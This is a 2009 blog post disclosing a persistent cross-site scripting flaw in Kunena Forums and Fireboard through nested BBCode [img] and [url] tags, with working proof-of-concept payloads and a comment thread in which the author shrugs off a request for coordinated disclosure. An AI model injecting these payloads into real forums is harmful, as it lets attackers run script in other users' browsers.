Monday, 06 July 2009 15:06

Here's a rather nasty persistent XSS vulnerability I found today in Kunena Forums. Using nested [img] tags, it is possible to inject script into the forums.

Here are some important highlights about this vulnerability:

  • brackets, braces, spaces, and quotes cannot be used in payload
  • BBCode must be enabled
  • you proabably have to have an account (as on most forums)
  • img url should be a known bad image, to trigger onerror event
  • there MUST be a space between the second opening [img] tag and the onerror

Without further ado, here's the (rather short) code:

[img] [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

UPDATE: This XSS works in the signature field as well as the post message.

UPDATE 2: Nested [url] tags are similarly vulnerable, but require user interaction to execute as well as an ending double slash in the XSS to prevent the js engine from interpreting a hanging quote.

[url][url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

UPDATE 3: Kunena is a Joomla 1.5 implementation of Fireboard. As it turns out, Fireboard is also vulnerable to this attack vector.

Last Updated on Monday, 06 July 2009 22:15
Comments (2)
1 Wednesday, 08 July 2009 03:30
Next time, please give developers some time to fix vulnerabilities before publishing it.

Fix ban be found from:
2 Wednesday, 08 July 2009 23:43
Jeff Channell
The resulting chaos can be fun to watch sometimes.

Besides, this is a trick akin to that has been public for 8 months.

Add your comment

Your name:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Joomla Extensions